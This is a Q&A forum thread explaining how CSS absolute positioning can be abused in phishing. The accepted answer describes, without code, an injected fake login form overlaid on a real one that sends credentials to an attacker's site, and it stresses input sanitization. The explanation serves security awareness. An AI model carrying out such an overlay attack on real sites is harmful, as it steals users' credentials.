Phishing And CSS position:absolute

496 views Asked by At

How CSS position:absolute rule actually helps phishing?

Can someone help me out, I'm confused :(

2

There are 2 answers

0
David On BEST ANSWER

Look for a section called "Overriding Page Content" here.

It's not so much that absolute positioning "helps" phishing, not any more than cars "help" drunk driving. But it is a tool that can be used for malicious purposes.

For example, say you're running a website where users can login and post comments. Say also that you don't properly sanitize your input and output and a user determines that he can post pure HTML content to his heart's content. He decides to craft a post which includes an absolute-positioned div which mimics your login form identically and is positioned on top of it, obscuring your form. His new form posts the login credentials to his site instead of yours, and redirects the users back to your page.

The users, not suspecting anything has changed, enter their login credentials. They're presented with the same page again. Maybe they try again, maybe they click on "forgot password," maybe they give up, etc. Either way, he now has their login credentials. Did any of your users register on your site with the same credentials they use to login to their email? Their employer? Their bank?

Basically, the combination of an insecure website and some crafted absolutely-positioned content compromised the users.

0
n00b On

the point of phishing is extracting information by fooling the user that we are legit / xss etc.

position absolute allows you to break out of the position and do everything, think how you would use that to fool the user.

the rule itself is not bad or to blame but the security of sites and users themselves.

i didnt give you an answer but if youre not lazy youll find it here yourself